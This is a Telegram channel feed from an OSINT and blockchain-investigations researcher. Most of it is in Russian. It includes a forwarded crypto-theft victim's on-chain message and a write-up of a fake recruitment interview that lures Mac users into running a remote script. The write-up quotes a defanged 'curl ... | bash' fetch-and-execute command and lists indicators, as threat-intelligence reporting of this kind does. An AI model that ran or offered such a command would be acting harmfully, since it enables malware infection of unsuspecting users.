сelestial intelligence lab
1.05K subscribers
87 photos
4 videos
3 files
52 links
building cool things with cool people🕵️‍♂️
@celestial3301
Download Telegram
Forwarded from Defimon Alerts
💌 Onchain message:

Hi, Wojciech. After you asked me to install an application called "Meridian," during which I entered my Mac password and created a vault at you request, $584,000 in crypto assets were stolen from four wallets on my computer two hours later.
​The stolen funds were transferred to four different wallets, swapped for DAI, and subsequently deposited into or withdrawn from KuCoin and Bybit.
(Address : 0x1675c4ff3be4aff3e60b486304c11d4fe7d58333, 0xD1ec24046e5f12306491d6076F9F4AE1A72C7Fc1)
​Police investigators have already issued official cooperation requests to the respective exchanges. During yesterday's investigation, it was confirmed that creating a vault through Meridian allows for password extraction—a step I completed per his instruction during our meeting. All of this information has been fully documented and submitted to the authorities.
​Furthermore, I am preparing for an international lawsuit alongside two other victims who experienced similar incidents, working directly with our legal counsel starting today. We are also planning to bring public awareness to this issue through posts across key opinion leader (KOL) networks, reaching a combined total of over 300,000 followers. (Also will share all details regarding our meeting)
​However, recognizing that full legal will require a significant amount of time for all parties involved, I am offering a final opportunity to resolve this matter directly:
​If you return $350,000 of the stolen $584,000 to the following address: 0x8f78070669a67fcaB7Efb2358386701584Bd7ef0, I will immediately drop all further actions and move past this incident, accepting partial responsibility for my own oversight.
​If this amount is not returned, I will proceed immediately with the international lawsuit and all law enforcement steps through our legal team and investigators.


📤 From: 0x5afdd71ec312eda36663f72032f269bd9c950cb4
📥 To: 0x956c33a642435ebf9938ad109032c180cf0cf26c
🌎 Network: mainnet

Etherscan
8
Прочитайте и поймите, что не надо качать подозрительные приложения)
Ну и в целом приложения от неизвестных разработчиков
(особенно если вас об этом попросили)
❤‍🔥7👍4
🇰🇿 AFSA и Генпрокуратура Казахстана формализовали сотрудничество по расследованиям преступлений с цифровыми активами

Ну всё, ребята, теперь даже по мелкому блечить не получится, вас всех найдут
❤‍🔥8😁21
AFSA почему-то до сих пор не написали с просьбой у них работать…

Начальники, рекрутеры - я жду ваших предложений и рефералок.

Давайте уже наводить криптодвиж и делать KZ лучше, пока я не уехал делать Америку лучше.

Если у вас есть интересные задачи на стыке OSINT / blockchain investigations / CTI - вы знаете, где меня найти)
9
Казахстан теперь разрешает иностранцам использовать крипту для участия в Investment Tax Residency Programme через AIFC

С 13 августа можно держать от $150 000 в digital assets через AFSA-licensed платформу и использовать это как qualifying investment. Дальше при выполнении условий - инвесторская виза до 5 лет и налоговое резидентство Казахстана, где достаточно 90 дней присутствия вместо стандартных 183.

То есть условному инвестору не обязательно продавать BTC и перекладываться в локальный актив ради residency - часть капитала можно оставить в крипте

Выглядит как довольно сильный ход со стороны Казахстана)
12
Хороший был год в SOC, но пора двигаться дальше
😁14👍4❤‍🔥32🤝2
Внуково закрыли и я теперь застрял в аэропорту на неопределенный срок. Чувствую себя Виктором Наворски

UPD: в 09:15 объявили посадку, до встречи в Москве
😭10
Forwarded from celestial
This media is not supported in your browser
VIEW IN TELEGRAM
6
⬜️ Аэропорты

ВНУКОВО

ШЕРЕМЕТЬЕВО

✈️СНЯТЫ ограничения на прием и выпуск воздушных судов.

✈️Ограничения вводили для обеспечения безопасности полетов.

✈️Говорит Росавиация | MАХ
Please open Telegram to view this post
VIEW IN TELEGRAM
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема.

Многое пришлось сильно урезать: что-то из-за небольшого временного слота, а что-то - из соображений безопасности. В какой-то момент меня ещё и довольно сильно накрыла паничка, было жарковато во всех смыслах :) Но я закончил доклад и дошёл до конца.

Отдельное спасибо OSINT Mindset - людям, которые для меня уже давно не просто комьюнити, а очень близкие друзья. И спасибо моим близким, которые остались в Казахстане и поддерживали меня на расстоянии.

Огромное спасибо организаторам Community Zone за возможность выступить и за весь этот движ. И отдельно ENZO - за поддержку и за то, сколько сил она вложила во всё это.

В такие моменты особенно понимаешь, насколько важно, какие люди находятся рядом. Я правда очень ценю вас и счастлив быть рядом с вами.

Ну и для тех, кто всё-таки ждёт продолжение исследования в виде полноценной статьи - надеюсь, дождётесь конца сентября. Там уже получится нормально развернуть всю историю, показать то, что не вошло в доклад, и добавить намного больше технических деталей.

Будет очень круто и интересно.
❤‍🔥187👍3🔥2
сelestial intelligence lab
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема. Многое пришлось сильно урезать: что-то из-за небольшого…
Кстати, забавный момент после выступления. Подходили ребята, которые до этого видели меня на Standoff Talks, и сразу заметили, что в этот раз всё было немного иначе 😄

Пару человек такие: «Мы тебя на Standoff Talks видели, ты там вообще по-другому выступал».

Я рассказал, что в этот раз сильно перенервничал уже непосредственно на сцене, плюс тема была намного тяжелее для подачи и многое пришлось ужать в короткий слот.

И у них сразу такое: «Ааа, ну тогда понятно»

На самом деле было даже приятно, что люди, которые видели прошлое выступление, сами заметили разницу. Значит, есть с чем сравнивать и куда дальше расти
❤‍🔥11
сelestial intelligence lab
Это было одно из моих первых выступлений именно с собственным исследованием, и, если честно, выступать с ним на OFFZONE было дико страшно. Всё-таки такая площадка, конференция и довольно непростая тема. Многое пришлось сильно урезать: что-то из-за небольшого…
И ещё момент, который мне немного тяжело отпустить))))

Мне правда неловко перед ENZO и перед теми, кто впервые пришёл послушать именно меня. Потому что я знаю, что могу выступать гораздо лучше, чем получилось в этот раз.

Все вокруг говорят, что всё было нормально и, возможно, я действительно слишком критично к себе отношусь. Но всё равно очень надеюсь, что у тех, кто увидел меня впервые, не осталось впечатления, будто я всегда так выступаю 😭

В любом случае для себя выводы я сделал. В следующий раз хочу выйти на сцену уже намного спокойнее и показать тот уровень, который сам от себя ожидаю


UPD: но много челов фоткали мои слайды, приятно)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥14👏2
Forwarded from Soxoj insides (Soxoj)
Bookmarked a cool command-line OSINT tool from GitHub but never found time to try it?

I built OSINT Tool Deploy Skill for Claude Code which turns a GitHub link into a working tool 💪 with deployment and verification that it actually works. Windows is supported!

Installation time decreases from hours to minutes 📉 with templates and a knowledge base of common issues and fixes.

Investigate crimes, not Python dependency errors 🥸

👉 Try it: https://github.com/soxoj/claude-osint-deploy
Please open Telegram to view this post
VIEW IN TELEGRAM
6
Forwarded from Cyber Detective
Digital Asset Inventory by @pandora_intelligence

Local-first scanner for discovering accounts and digital assets from data you already have:
- bookmarks
- password-manager exports
- browser history
- local email archives
- saved Google/Apple connected-app pages.

https://github.com/Panda-Lewandowski/digital_asset_inventory
9
Как вакансия Blockchain Analyst закончилась curl | bash

Несколько дней назад я откликнулся на вакансию Blockchain Analyst в WhatIf через LinkedIn. На первый взгляд всё выглядело нормально: полноценное описание роли, Web3/blockchain research, on-chain analytics, remote US, зарплата $85k–125k в год. Сама вакансия действительно была опубликована от страницы WhatIf в LinkedIn. LinkedIn

У компании тоже есть нормальный публичный след: страница существует не первый день, WhatIf указывает 2019 год основания, Dubai, размер 2–10 сотрудников и blockchain среди направлений работы.
Вакансия Blockchain Analyst
LinkedIn WhatIf
После отклика мне написал человек под именем Emma Martin с адреса, отображавшегося как emma.martin@whatif.capital.

Первое письмо вообще без красных флагов: когда готов выйти, могу ли работать remote, сколько хочу денег, сколько лет опыта и что из моего опыта наиболее релевантно позиции.

После этого назначили интервью через RelayArc.
RelayArc
Первый странный момент - с телефона на встречу зайти нельзя вообще. Страница прямо говорит: Desktop required.

Ладно. Открываю ссылку с Mac, попадаю в вполне прилично сделанный интерфейс видеозвонка. На другой стороне - Emma Martin.
Только довольно быстро становится понятно, что никакого нормального разговора там нет.

Видео выглядит записанным, а через несколько минут в чате начинается сценарий:
“Can you see and hear me okay?”
Потом:
“I still cannot hear you…”
И наконец предложение воспользоваться встроенным microphone troubleshooting.

Начинается непосредственно delivery.
RelayArc сообщает, что браузер якобы не смог определить микрофон и для полноценного аудио необходимо установить RelayArc for Mac.
Кнопка большая, всё выглядит как обычный troubleshooting какого-нибудь Zoom.
Нажимаем Download App - и внезапно вместо .dmg, App Store или хотя бы подписанного installer получаем инструкцию:

открыть Terminal и выполнить одну команду.
На странице была команда вида:
curl -kfsSL hxxps://download-storage[.]com/... | bash

То есть сервис предлагает скачать содержимое с другого домена и сразу передать его на выполнение в bash.

На этом «интервью» можно было заканчивать.

Получилась довольно аккуратная цепочка:
LinkedIn vacancy → recruiter → screening → scheduled interview → fake video call → искусственная проблема с микрофоном → “desktop app” → curl | bash

Месяц назад другой человек описывал очень похожую Web3 recruitment-схему: вакансия через LinkedIn, затем интервью на неизвестной meeting-платформе Werknova, а recruiter представлялся тем же именем - Emma Martin. Он тоже заметил, что взаимодействие выглядело заранее записанным.

Я пока не утверждаю, что сама WhatIf стоит за этой кампанией. Здесь ещё надо разбираться отдельно: действительно ли письмо было аутентифицировано инфраструктурой whatif.capital, был ли скомпрометирован корпоративный аккаунт/домен или использовалась другая схема.

Но сам infection flow уже достаточно очевиден.

IOC / артефакты на текущий момент:
relayarc[.]io
Persona: Emma Martin
Lure: Blockchain Analyst / Web3 recruitment
Execution: remote shell script via curl ... | bash

Но теперь уже интересно посмотреть, что именно они пытались поставить, куда ходит скрипт, что он собирает и пересекается ли инфраструктура RelayArc с другими fake-interview кампаниями

Так что продолжение, скорее всего, будет)
🔥17👍32
Загружаю все доказательства, секунду)
🤩7